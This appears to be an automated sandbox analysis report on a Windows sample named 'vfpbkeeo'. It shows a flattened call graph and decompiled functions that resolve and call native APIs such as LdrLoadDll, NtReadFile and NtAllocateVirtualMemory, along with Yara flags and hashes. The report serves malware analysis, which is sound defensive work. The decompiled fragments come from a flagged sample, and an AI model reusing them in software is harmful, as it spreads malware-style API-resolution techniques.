API calls 25220->25222 25225 418dd7 25221->25225 25224 418c62 25222->25224 25226 41e5d3 LdrLoadDll 25223->25226 25224->25169 25277 41e613 LdrLoadDll 25225->25277 25227 418ca8 25226->25227 25229 418cc4 25227->25229 25230 418caf 25227->25230 25233 418cc9 25229->25233 25234 418cdf 25229->25234 25232 41e783 2 API calls 25230->25232 25231 418e11 25235 41e783 2 API calls 25231->25235 25236 418cb8 25232->25236 25237 41e783 2 API calls 25233->25237 25243 418ce4 25234->25243 25265 4202d3 25234->25265 25238 418e1c 25235->25238 25236->25169 25239 418cd2 25237->25239 25238->25169 25239->25169 25242 418d4a 25244 418d61 25242->25244 25276 41e593 LdrLoadDll 25242->25276 25250 418cf6 25243->25250 25268 41e703 25243->25268 25246 418d68 25244->25246 25247 418d7d 25244->25247 25248 41e783 2 API calls 25246->25248 25249 41e783 2 API calls 25247->25249 25248->25250 25251 418d86 25249->25251 25250->25169 25252 418db2 25251->25252 25271 41fff3 25251->25271 25252->25169 25254 418d9d 25255 4201f3 2 API calls 25254->25255 25256 418da6 25255->25256 25256->25169 25257->25143 25258->25164 25260 41f2c3 LdrLoadDll 25259->25260 25261 419525 25260->25261 25262 41e613 LdrLoadDll 25261->25262 25262->25168 25263->25151 25264->25214 25278 41e923 25265->25278 25267 4202eb 25267->25243 25269 41f2c3 LdrLoadDll 25268->25269 25270 41e71f NtReadFile 25269->25270 25270->25242 25272 420000 25271->25272 25273 420017 25271->25273 25272->25273 25274 4202d3 2 API calls 25272->25274 25273->25254 25275 42002e 25274->25275 25275->25254 25276->25244 25277->25231 25279 41f2c3 LdrLoadDll 25278->25279 25280 41e93f RtlAllocateHeap 25279->25280 25280->25267 25412 41e833 25281->25412 25283 4201a0 25283->25176 25285 418864 25284->25285 25286 41886c 25284->25286 25285->25178 25315 418b3f 25286->25315 25415 421373 25286->25415 25288 4188c0 25289 421373 2 API calls 25288->25289 25292 4188cb 25289->25292 25290 418919 25293 421373 2 API calls 25290->25293 25292->25290 25294 4214a3 3 API calls 25292->25294 25426 421413 LdrLoadDll RtlAllocateHeap RtlFreeHeap 25292->25426 25296 41892d 25293->25296 25294->25292 25295 41898a 25297 421373 2 API calls 25295->25297 25296->25295 25420 4214a3 25296->25420 25303 4189a0 25297->25303 25299 4189dd 25300 421373 2 API calls 25299->25300 25302 4189e8 25300->25302 25301 4214a3 3 API calls 25301->25303 25304 4214a3 3 API calls 25302->25304 25311 418a22 25302->25311 25303->25299 25303->25301 25304->25302 25306 418b17 25428 4213d3 LdrLoadDll RtlFreeHeap 25306->25428 25308 418b21 25429 4213d3 LdrLoadDll RtlFreeHeap 25308->25429 25310 418b2b 25430 4213d3 LdrLoadDll RtlFreeHeap 25310->25430 25427 4213d3 LdrLoadDll RtlFreeHeap 25311->25427 25313 418b35 25431 4213d3 LdrLoadDll RtlFreeHeap 25313->25431 25315->25178 25317 419bc4 25316->25317 25318 419253 8 API calls 25317->25318 25322 419bda 25318->25322 25319 419be3 25319->25182 25320 419c1a 25321 4201f3 2 API calls 25320->25321 25323 419c2b 25321->25323 25322->25319 25322->25320 25324 419c66 25322->25324 25323->25182 25325 4201f3 2 API calls 25324->25325 25326 419c6b 25325->25326 25326->25182 25432 41ef43 25327->25432 25329 41f0c7 25330 41ef43 LdrLoadDll 25329->25330 25331 41f0d0 25330->25331 25332 41ef43 LdrLoadDll 25331->25332 25333 41f0d9 25332->25333 25334 41ef43 LdrLoadDll 25333->25334 25335 41f0e2 25334->25335 25336 41ef43 LdrLoadDll 25335->25336 25337 41f0eb 25336->25337 25338 41ef43 LdrLoadDll 25337->25338 25339 41f0f4 25338->25339 25340 41ef43 LdrLoadDll 25339->25340 25341 41f100 25340->25341 25342 41ef43 LdrLoadDll 25341->25342 25343 41f109 25342->25343 25344 41ef43 LdrLoadDll 25343->25344 25345 41f112 25344->25345 25346 41ef43 LdrLoadDll 25345->25346 25347 41f11b 25346->25347 25348 41ef43 LdrLoadDll 25347->25348 25349 41f124 25348->25349 25350 41ef43 LdrLoadDll 25349->25350 25351 41f12d 25350->25351 25352 41ef43 LdrLoadDll 25351->25352 25353 41f139 25352->25353 25354 41ef43 LdrLoadDll 25353->25354 25355 41f142 25354->25355 25356 41ef43 LdrLoadDll 25355->25356 25357 41f14b 25356->25357 25358 41ef43 LdrLoadDll 25357->25358 25359 41f154 25358->25359 25360 41ef43 LdrLoadDll 25359->25360 25361 41f15d 25360->25361 25362 41ef43 LdrLoadDll 25361->25362 25363 41f166 25362->25363 25364 41ef43 LdrLoadDll 25363->25364 25365 41f172 25364->25365 25366 41ef43 LdrLoadDll 25365->25366 25367 41f17b 25366->25367 25368 41ef43 LdrLoadDll 25367->25368 25369 41f184 25368->25369 25370 41ef43 LdrLoadDll 25369->25370 25371 41f18d 25370->25371 25372 41ef43 LdrLoadDll 25371->25372 25373 41f196 25372->25373 25374 41ef43 LdrLoadDll 25373->25374 25375 41f19f 25374->25375 25376 41ef43 LdrLoadDll 25375->25376 25377 41f1ab 25376->25377 25378 41ef43 LdrLoadDll 25377->25378 25379 41f1b4 25378->25379 25380 41ef43 LdrLoadDll 25379->25380 25381 41f1bd 25380->25381 25382 41ef43 LdrLoadDll 25381->25382 25383 41f1c6 25382->25383 25384 41ef43 LdrLoadDll 25383->25384 25385 41f1cf 25384->25385 25386 41ef43 LdrLoadDll 25385->25386 25387 41f1d8 25386->25387 25388 41ef43 LdrLoadDll 25387->25388 25389 41f1e4 25388->25389 25390 41ef43 LdrLoadDll 25389->25390 25391 41f1ed 25390->25391 25392 41ef43 LdrLoadDll 25391->25392 25393 41f1f6 25392->25393 25394 41ef43 LdrLoadDll 25393->25394 25395 41f1ff 25394->25395 25396 41ef43 LdrLoadDll 25395->25396 25397 41f208 25396->25397 25398 41ef43 LdrLoadDll 25397->25398 25399 41f211 25398->25399 25400 41ef43 LdrLoadDll 25399->25400 25401 41f21d 25400->25401 25402 41ef43 LdrLoadDll 25401->25402 25403 41f226 25402->25403 25404 41ef43 LdrLoadDll 25403->25404 25405 41f22f 25404->25405 25405->25186 25407 41f2c3 LdrLoadDll 25406->25407 25408 41e1cf 25407->25408 25438 9e9860 LdrInitializeThunk 25408->25438 25409 41e1e6 25409->25188 25411->25183 25413 41f2c3 LdrLoadDll 25412->25413 25414 41e84f NtAllocateVirtualMemory 25413->25414 25414->25283 25416 421383 25415->25416 25417 421389 25415->25417 25416->25288 25418 4202d3 2 API calls 25417->25418 25419 4213af 25418->25419 25419->25288 25421 421413 25420->25421 25422 4202d3 2 API calls 25421->25422 25423 421470 25421->25423 25424 42144d 25422->25424 25423->25296 25425 4201f3 2 API calls 25424->25425 25425->25423 25426->25292 25427->25306 25428->25308 25429->25310 25430->25313 25431->25315 25433 41ef5e 25432->25433 25434 419663 LdrLoadDll 25433->25434 25435 41ef7e 25434->25435 25436 419663 LdrLoadDll 25435->25436 25437 41f032 25435->25437 25436->25437 25437->25329 25437->25437 25438->25409 25440 9e968f LdrInitializeThunk 25439->25440 25441 9e9681 25439->25441 25440->25192 25441->25192 25443 41f2c3 LdrLoadDll 25442->25443 25444 41e97f RtlFreeHeap 25443->25444 25444->25196 25446 4094b3 25445->25446 25447 4094ae 25445->25447 25448 420173 2 API calls 25446->25448 25447->25127 25451 4094d8 25448->25451 25449 40953b 25449->25127 25450 41e1b3 2 API calls 25450->25451 25451->25449 25451->25450 25452 409541 25451->25452 25456 420173 2 API calls 25451->25456 25461 41e8b3 25451->25461 25453 409567 25452->25453 25455 41e8b3 2 API calls 25452->25455 25453->25127 25457 409558 25455->25457 25456->25451 25457->25127 25459 41e8b3 2 API calls 25458->25459 25460 409781 25459->25460 25460->25088 25462 41f2c3 LdrLoadDll 25461->25462 25463 41e8cf 25462->25463 25466 9e96e0 LdrInitializeThunk 25463->25466 25464 41e8e6 25464->25451 25466->25464 25468 41f956 25467->25468 25469 40cf93 LdrLoadDll 25468->25469 25470 40be44 25469->25470 25470->25096 25472 40d306 25471->25472 25474 40d383 25472->25474 25483 41df83 LdrLoadDll 25472->25483 25474->25101 25476 41f2c3 LdrLoadDll 25475->25476 25477 41eae2 LookupPrivilegeValueW 25476->25477 25477->25106 25479 41f2c3 LdrLoadDll 25478->25479 25480 41e56f 25479->25480 25484 9e9910 LdrInitializeThunk 25480->25484 25481 41e58e 25481->25107 25483->25474 25484->25481 25486 40d48a 25485->25486 25487 40d2e3 LdrLoadDll 25486->25487 25488 40d4ed 25487->25488 25488->25058 25490 41003d 25489->25490 25498 4100f3 25489->25498 25491 40d2e3 LdrLoadDll 25490->25491 25492 41005f 25491->25492 25499 41e233 25492->25499 25494 4100a1 25502 41e273 25494->25502 25497 41e783 2 API calls 25497->25498 25498->25061 25498->25062 25500 41f2c3 LdrLoadDll 25499->25500 25501 41e24f 25500->25501 25501->25494 25503 41f2c3 LdrLoadDll 25502->25503 25504 41e28f 25503->25504 25507 9e9fe0 LdrInitializeThunk 25504->25507 25505 4100e7 25505->25497 25507->25505 25509 40ddfd 25508->25509 25510 40d463 LdrLoadDll 25509->25510 25511 40de75 25510->25511 25544 40d0e3 25511->25544 25513 40de9b 25543 40e0ec 25513->25543 25553 418b83 25513->25553 25515 40dee0 25515->25543 25556 40a0d3 25515->25556 25517 40df24 25517->25543 25578 41e7f3 25517->25578 25521 40df7a 25522 40df81 25521->25522 25590 41e303 25521->25590 25523 4201f3 2 API calls 25522->25523 25525 40df8e 25523->25525 25525->25075 25527 40dfcb 25528 4201f3 2 API calls 25527->25528 25529 40dfd2 25528->25529 25529->25075 25530 40dfdb 25531 4101e3 3 API calls 25530->25531 25532 40e04f 25531->25532 25532->25522 25533 40e05a 25532->25533 25534 4201f3 2 API calls 25533->25534 25535 40e07e 25534->25535 25595 41e353 25535->25595 25538 41e303 2 API calls 25539 40e0b9 25538->25539 25539->25543 25600 41e113 25539->25600 25542 41e9a3 2 API calls 25542->25543 25543->25075 25545 40d0f0 25544->25545 25546 40d0f4 25544->25546 25545->25513 25547 40d13f 25546->25547 25550 40d10d 25546->25550 25606 41dfc3 LdrLoadDll 25547->25606 25549 40d150 25549->25513 25605 41dfc3 LdrLoadDll 25550->25605 25552 40d12f 25552->25513 25554 4101e3 3 API calls 25553->25554 25555 418ba9 25553->25555 25554->25555 25555->25515 25607 40a303 25556->25607 25558 40a2f9 25558->25517 25559 40a0f1 25559->25558 25560 4094a3 4 API calls 25559->25560 25561 40a1cf 25559->25561 25568 40a12f 25560->25568 25561->25558 25562 4094a3 4 API calls 25561->25562 25564 40a2af 25561->25564 25572 40a20c 25562->25572 25564->25558 25654 410453 10 API calls 25564->25654 25565 40a2c3 25565->25558 25655 410453 10 API calls 25565->25655 25567 40a2d9 25567->25558 25656 410453 10 API calls 25567->25656 25568->25561 25573 40a1c5 25568->25573 25621 409db3 25568->25621 25570 40a2ef 25570->25517 25572->25564 25575 409db3 14 API calls 25572->25575 25576 40a2a5 25572->25576 25574 409763 2 API calls 25573->25574 25574->25561 25575->25572 25577 409763 2 API calls 25576->25577 25577->25564 25579 41f2c3 LdrLoadDll 25578->25579 25580 41e80f 25579->25580 25738 9e98f0 LdrInitializeThunk 25580->25738 25581 40df5b 25583 4101e3 25581->25583 25584 410200 25583->25584 25739 41e2b3 25584->25739 25587 410248 25587->25521 25588 41e303 2 API calls 25589 410271 25588->25589 25589->25521 25591 41f2c3 LdrLoadDll 25590->25591 25592 41e31f 25591->25592 25745 9e9780 LdrInitializeThunk 25592->25745 25593 40dfbe 25593->25527 25593->25530 25596 41f2c3 LdrLoadDll 25595->25596 25597 41e36f 25596->25597 25746 9e97a0 LdrInitializeThunk 25597->25746 25598 40e092 25598->25538 25601 41f2c3 LdrLoadDll 25600->25601 25602 41e12f 25601->25602 25747 9e9a20 LdrInitializeThunk 25602->25747 25603 40e0e5 25603->25542 25605->25552 25606->25549 25608 40a32a 25607->25608 25609 4094a3 4 API calls 25608->25609 25616 40a58f 25608->25616 25610 40a37d 25609->25610 25611 409763 2 API calls 25610->25611 25610->25616 25612 40a40c 25611->25612 25613 4094a3 4 API calls 25612->25613 25612->25616 25614 40a421 25613->25614 25615 409763 2 API calls 25614->25615 25614->25616 25618 40a481 25615->25618 25616->25559 25617 4094a3 4 API calls 25617->25618 25618->25616 25618->25617 25619 409db3 14 API calls 25618->25619 25620 409763 2 API calls 25618->25620 25619->25618 25620->25618 25622 409dd8 25621->25622 25657 41e003 25622->25657 25625 409e2c 25625->25568 25626 409ead 25690 410333 LdrLoadDll NtClose 25626->25690 25627 41e1f3 2 API calls 25628 409e50 25627->25628 25628->25626 25630 409e5b 25628->25630 25632 409ed9 25630->25632 25660 40e103 25630->25660 25631 409ec8 25633 409ee5 25631->25633 25634 409ecf 25631->25634 25632->25568 25691 41e083 LdrLoadDll 25633->25691 25636 41e783 2 API calls 25634->25636 25636->25632 25637 409e75 25637->25632 25680 409be3 25637->25680 25639 409f10 25641 40e103 5 API calls 25639->25641 25643 409f30 25641->25643 25643->25632 25692 41e0b3 LdrLoadDll 25643->25692 25645 409f55 25693 41e143 LdrLoadDll 25645->25693 25647 409f6f 25648 41e113 2 API calls 25647->25648 25649 409f7e 25648->25649 25650 41e783 2 API calls 25649->25650 25651 409f88 25650->25651 25694 4099b3 25651->25694 25653 409f9c 25653->25568 25654->25565 25655->25567 25656->25570 25658 41f2c3 LdrLoadDll 25657->25658 25659 409e22 25658->25659 25659->25625 25659->25626 25659->25627 25661 40e131 25660->25661 25662 4101e3 3 API calls 25661->25662 25663 40e193 25662->25663 25664 40e1dc 25663->25664 25665 41e303 2 API calls 25663->25665 25664->25637 25666 40e1be 25665->25666 25667 40e1c8 25666->25667 25671 40e1e8 25666->25671 25668 41e353 2 API calls 25667->25668 25669 40e1d2 25668->25669 25670 41e783 2 API calls 25669->25670 25670->25664 25672 40e272 25671->25672 25673 40e255 25671->25673 25674 41e353 2 API calls 25672->25674 25675 41e783 2 API calls 25673->25675 25677 40e281 25674->25677 25676 40e25f 25675->25676 25676->25637 25678 41e783 2 API calls 25677->25678 25679 40e28b 25678->25679 25679->25637 25682 409bf9 25680->25682 25681 409d84 25681->25568 25682->25681 25710 4097a3 25682->25710 25684 409cf8 25684->25681 25685 4099b3 11 API calls 25684->25685 25686 409d26 25685->25686 25686->25681 25687 41e1f3 2 API calls 25686->25687 25688 409d5b 25687->25688 25688->25681 25689 41e7f3 2 API calls 25688->25689 25689->25681 25690->25631 25691->25639 25692->25645 25693->25647 25695 4099dc 25694->25695 25717 409913 25695->25717 25698 41e7f3 2 API calls 25699 4099ef 25698->25699 25699->25698 25700 409a7a 25699->25700 25703 409a75 25699->25703 25725 4103b3 25699->25725 25700->25653 25701 41e783 2 API calls 25702 409aad 25701->25702 25702->25700 25704 41e003 LdrLoadDll 25702->25704 25703->25701 25705 409b12 25704->25705 25705->25700 25729 41e043 25705->25729 25707 409b76 25707->25700 25708 419253 8 API calls 25707->25708 25709 409bcb 25708->25709 25709->25653 25711 4098a2 25710->25711 25712 4097b8 25710->25712 25711->25684 25712->25711 25713 419253 8 API calls 25712->25713 25714 409825 25713->25714 25715 4201f3 2 API calls 25714->25715 25716 40984c 25714->25716 25715->25716 25716->25684 25718 40992d 25717->25718 25719 40cf93 LdrLoadDll 25718->25719 25720 409948 25719->25720 25721 419663 LdrLoadDll 25720->25721 25722 409960 25721->25722 25723 40997c 25722->25723 25724 409969 PostThreadMessageW 25722->25724 25723->25699 25724->25723 25726 4103c6 25725->25726 25732 41e183 25726->25732 25730 41f2c3 LdrLoadDll 25729->25730 25731 41e05f 25730->25731 25731->25707 25733 41f2c3 LdrLoadDll 25732->25733 25734 41e19f 25733->25734 25737 9e9840 LdrInitializeThunk 25734->25737 25735 4103f1 25735->25699 25737->25735 25738->25581 25740 41f2c3 LdrLoadDll 25739->25740 25741 41e2cf 25740->25741 25744 9e99a0 LdrInitializeThunk 25741->25744 25742 410241 25742->25587 25742->25588 25744->25742 25745->25593 25746->25598 25747->25603 25750 9e9540 LdrInitializeThunk

                                                                                              Executed Functions

                                                                                              Function 0040CF93 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 272 40cf93-40cfbc call 420f93 275 40cfc2-40cfd0 call 4214b3 272->275 276 40cfbe-40cfc1 272->276 279 40cfe0-40cff1 call 41f833 275->279 280 40cfd2-40cfdd call 421733 275->280 285 40cff3-40d007 LdrLoadDll 279->285 286 40d00a-40d00d 279->286 280->279 285->286
                                                                                              C-Code - Quality: 100%
                                                                                              			E0040CF93(void* __eflags, void* _a4, intOrPtr _a8) {
				char* _v8;
				struct _EXCEPTION_RECORD _v12;
				struct _OBJDIR_INFORMATION _v16;
				char _v536;
				void* _t15;
				struct _OBJDIR_INFORMATION _t17;
				struct _OBJDIR_INFORMATION _t18;
				void* _t30;
				void* _t31;
				void* _t32;

				_v8 =  &_v536;
				_t15 = E00420F93( &_v12, 0x104, _a8);
				_t31 = _t30 + 0xc;
				if(_t15 != 0) {
					_t17 = E004214B3(__eflags, _v8);
					_t32 = _t31 + 4;
					__eflags = _t17;
					if(_t17 != 0) {
						E00421733( &_v12, 0);
						_t32 = _t32 + 8;
					}
					_t18 = E0041F833(_v8);
					_v16 = _t18;
					__eflags = _t18;
					if(_t18 == 0) {
						LdrLoadDll(0, 0,  &_v12,  &_v16); // executed
						return _v16;
					}
					return _t18;
				} else {
					return _t15;
				}
			}













                                                                                              0x0040cfaf
                                                                                              0x0040cfb2
                                                                                              0x0040cfb7
                                                                                              0x0040cfbc
                                                                                              0x0040cfc6
                                                                                              0x0040cfcb
                                                                                              0x0040cfce
                                                                                              0x0040cfd0
                                                                                              0x0040cfd8
                                                                                              0x0040cfdd
                                                                                              0x0040cfdd
                                                                                              0x0040cfe4
                                                                                              0x0040cfec
                                                                                              0x0040cfef
                                                                                              0x0040cff1
                                                                                              0x0040d005
                                                                                              0x00000000
                                                                                              0x0040d007
                                                                                              0x0040d00d
                                                                                              0x0040cfc1
                                                                                              0x0040cfc1
                                                                                              0x0040cfc1

                                                                                              APIs
                                                                                              • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0040D005
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.352064891.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_400000_vfpbkeeo.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Load
                                                                                              • String ID:
                                                                                              • API String ID: 2234796835-0
                                                                                              • Opcode ID: 08d05b120cc95a7b7398adf638b707615c4997d63fae75d0ade3ba13be0a099c
                                                                                              • Instruction ID: 83bf3352742b88718f051444706d527ce0a3d5e3692b3ed65d5cff8baa0b8952
                                                                                              • Opcode Fuzzy Hash: 08d05b120cc95a7b7398adf638b707615c4997d63fae75d0ade3ba13be0a099c
                                                                                              • Instruction Fuzzy Hash: 590175B1E0020DBBDF10DBE1DD82FDEB3789B54308F0041A6E908A7281F675EB098B55
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0041E653 Relevance: 1.5, APIs: 1, Instructions: 40filenativeCOMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 287 41e653-41e6a4 call 41f2c3 NtCreateFile
                                                                                              C-Code - Quality: 100%
                                                                                              			E0041E653(intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
				long _t21;

				_t3 = _a4 + 0xa6c; // 0xa6c
				E0041F2C3( *((intOrPtr*)(_a4 + 0x14)), _t15, _t3,  *((intOrPtr*)(_a4 + 0x14)), 0, 0x28);
				_t21 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
				return _t21;
			}




                                                                                              0x0041e662
                                                                                              0x0041e66a
                                                                                              0x0041e6a0
                                                                                              0x0041e6a4

                                                                                              APIs
                                                                                              • NtCreateFile.NTDLL(00000060,00000000,?,004193BF,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,004193BF,?,00000000,00000060,00000000,00000000), ref: 0041E6A0
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.352064891.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_400000_vfpbkeeo.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: CreateFile
                                                                                              • String ID:
                                                                                              • API String ID: 823142352-0
                                                                                              • Opcode ID: 0e100477f5381d3d7289312ef97c1911a17bc4e8064b3a3f2b56bd156d4f763d
                                                                                              • Instruction ID: ea7fb49e903bb1d58e718aada56f5a47c08ab44cf7c720fc9dcc69ac7de34c70
                                                                                              • Opcode Fuzzy Hash: 0e100477f5381d3d7289312ef97c1911a17bc4e8064b3a3f2b56bd156d4f763d
                                                                                              • Instruction Fuzzy Hash: 9DF0BDB6204208ABCB08CF89DC85EEB37ADAF8C754F018248BA0997241D630E8518BA4
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0041E703 Relevance: 1.5, APIs: 1, Instructions: 36filenativeCOMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 290 41e703-41e74c call 41f2c3 NtReadFile
                                                                                              C-Code - Quality: 37%
                                                                                              			E0041E703(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, intOrPtr _a40) {
				void* _t18;
				intOrPtr* _t27;

				_t3 = _a4 + 0xa74; // 0xa76
				_t27 = _t3;
				E0041F2C3( *((intOrPtr*)(_a4 + 0x14)), _t13, _t27,  *((intOrPtr*)(_a4 + 0x14)), 0, 0x2a);
				_t18 =  *((intOrPtr*)( *_t27))(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40); // executed
				return _t18;
			}





                                                                                              0x0041e712
                                                                                              0x0041e712
                                                                                              0x0041e71a
                                                                                              0x0041e748
                                                                                              0x0041e74c

                                                                                              APIs
                                                                                              • NtReadFile.NTDLL(00419583,00414A4F,FFFFFFFF,0041906D,00000002,?,00419583,00000002,0041906D,FFFFFFFF,00414A4F,00419583,00000002,00000000), ref: 0041E748
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.352064891.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_400000_vfpbkeeo.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: FileRead
                                                                                              • String ID:
                                                                                              • API String ID: 2738559852-0
                                                                                              • Opcode ID: 844797972357584b4267d2b4ccdf650626f96eee6e100a2b7eb001bcc7868e0e
                                                                                              • Instruction ID: bf6e0719c8dc31278f39646f46495de2219507908b228c0ef8df848d804b6b99
                                                                                              • Opcode Fuzzy Hash: 844797972357584b4267d2b4ccdf650626f96eee6e100a2b7eb001bcc7868e0e
                                                                                              • Instruction Fuzzy Hash: 39F0FFB6200208ABCB04DF89DC84EEB77ADAF8C714F018649BA0DA7241D630E8118BA0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0041E833 Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 293 41e833-41e870 call 41f2c3 NtAllocateVirtualMemory
                                                                                              C-Code - Quality: 100%
                                                                                              			E0041E833(intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
				long _t14;

				E0041F2C3( *((intOrPtr*)(_a4 + 0x14)), _a4, _t10 + 0xa8c,  *((intOrPtr*)(_a4 + 0x14)), 0, 0x30);
				_t14 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
				return _t14;
			}




                                                                                              0x0041e84a
                                                                                              0x0041e86c
                                                                                              0x0041e870

                                                                                              APIs
                                                                                              • NtAllocateVirtualMemory.NTDLL(00010000,?,00000000,?,00000004,00001000,00000000), ref: 0041E86C
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.352064891.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_400000_vfpbkeeo.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: AllocateMemoryVirtual
                                                                                              • String ID:
                                                                                              • API String ID: 2167126740-0
                                                                                              • Opcode ID: 007d9bb2bc6f869d9d5f2aff9c303a90246c852ee550cafd5b2adb6fd69cc88f
                                                                                              • Instruction ID: 4cb123024038679347e4010334fd08610e9ab7f2de04de3c8053adaa4ad1b66e
                                                                                              • Opcode Fuzzy Hash: 007d9bb2bc6f869d9d5f2aff9c303a90246c852ee550cafd5b2adb6fd69cc88f
                                                                                              • Instruction Fuzzy Hash: 90F01EB6200208ABCB18DF89DC81EEB77ADAF88754F018559BE0897241C630F911CBB4
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0041E783 Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 310 41e783-41e7ac call 41f2c3 NtClose
                                                                                              C-Code - Quality: 100%
                                                                                              			E0041E783(intOrPtr _a4, void* _a8) {
				long _t8;

				E0041F2C3( *((intOrPtr*)(_a4 + 0x14)), _a4, _t5 + 0xa7c,  *((intOrPtr*)(_a4 + 0x14)), 0, 0x2c);
				_t8 = NtClose(_a8); // executed
				return _t8;
			}




                                                                                              0x0041e79a
                                                                                              0x0041e7a8
                                                                                              0x0041e7ac

                                                                                              APIs
                                                                                              • NtClose.NTDLL(00410398,00000000,?,00410398,?,?,?,?,?,?,?,00000000,?,00000000), ref: 0041E7A8
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.352064891.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_400000_vfpbkeeo.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Close
                                                                                              • String ID:
                                                                                              • API String ID: 3535843008-0
                                                                                              • Opcode ID: 675b6986af3fbe89ca5381cf45abfbeb38fb14a73c53f9364842799534e556c6
                                                                                              • Instruction ID: 7f662cf3f934abcba5c5f58e64a069b72416408c39e66c886e8fc867a9434967
                                                                                              • Opcode Fuzzy Hash: 675b6986af3fbe89ca5381cf45abfbeb38fb14a73c53f9364842799534e556c6
                                                                                              • Instruction Fuzzy Hash: 6DD012766042146BD610EB99DC45FD77B5CDF48664F018455BA1C5B242D571FA0086E1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 009E98F0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.352445837.0000000000980000.00000040.00001000.00020000.00000000.sdmp, Offset: 00980000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_980000_vfpbkeeo.jbxd
                                                                                              Similarity
                                                                                              • API ID: InitializeThunk
                                                                                              • String ID:
                                                                                              • API String ID: 2994545307-0
                                                                                              • Opcode ID: a6554942eb931c3db285a10048c07841e581976ba484988e1078336a6ac76aa6
                                                                                              • Instruction ID: cf34d5b547a56aaa548078df18e7d27f07b6a0becd3865529956efcb3de90b63
                                                                                              • Opcode Fuzzy Hash: a6554942eb931c3db285a10048c07841e581976ba484988e1078336a6ac76aa6
                                                                                              • Instruction Fuzzy Hash: 3D90026160210902D21171594404626004B97D0381F92C032A2414555ECA658992F271
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 009E9840 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.352445837.0000000000980000.00000040.00001000.00020000.00000000.sdmp, Offset: 00980000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_980000_vfpbkeeo.jbxd
                                                                                              Similarity
                                                                                              • API ID: InitializeThunk
                                                                                              • String ID:
                                                                                              • API String ID: 2994545307-0
                                                                                              • Opcode ID: 18d29f01b25ef1566409d933b143ecb31a117b9397a1fcfc0945fe9897fa337b
                                                                                              • Instruction ID: 43858a0348606859046fb4717429173481194994afec4f17819eddd5af0d2e88
                                                                                              • Opcode Fuzzy Hash: 18d29f01b25ef1566409d933b143ecb31a117b9397a1fcfc0945fe9897fa337b
                                                                                              • Instruction Fuzzy Hash: A7900261243145525655B15944045174047A7E0381792C022A2804950C85669856F761
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

